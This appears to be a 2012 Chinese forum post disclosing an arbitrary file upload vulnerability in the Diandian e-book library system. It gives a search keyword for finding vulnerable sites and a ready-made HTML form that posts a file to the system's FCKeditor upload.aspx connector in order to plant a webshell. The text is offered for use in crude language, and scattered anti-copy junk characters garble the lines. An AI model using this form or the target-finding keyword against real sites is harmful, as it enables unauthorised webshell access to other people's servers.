主题:图书馆系统任意文件上传漏洞
, F1 j& \# Y8 `7 h( ? 作者:冰锋刺客
& ~; |8 T* L3 z% {$ Z. p4 {9 g1 @' F$ ~ 厂商:点击书(dianjishu.com)9 I4 K: @9 L( e. M! t
日期:2012-6-21
. \# f( n4 d1 f$ R
( e/ R: x1 G$ SI 概述+ {& t. ]7 L0 E& g& Q" [
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
/ v9 @3 @" P8 m! @ II 简介* Z) F% l3 c Y/ x
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
9 i S! @+ F( V# m" M& i 补充一个漏洞
4 {. W* I. Y0 |# ?+ } <form id="frmUpload" enctype="multipart/form-data"
' v T8 Y' D/ [9 N, R action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>/ y2 [# k+ D" k# {3 f! J
<input id="btnUpload" type="submit" value="操翻他">/ d Q9 S+ ?6 O2 {( Q q
</form>
: K% s' E( F( a 你们懂的
: D. |7 O4 e5 V 那傻逼提供还需要改包.5 E( H# H2 M# W) ^6 o
自己看了下源代码发现fckeditor
. N# X$ H6 r" Z, ]4 H! a) P- T 直接秒杀; X8 x _+ U0 L! @5 B: x
|
发表于 2012-9-10 21:20:59
收藏
支持
反对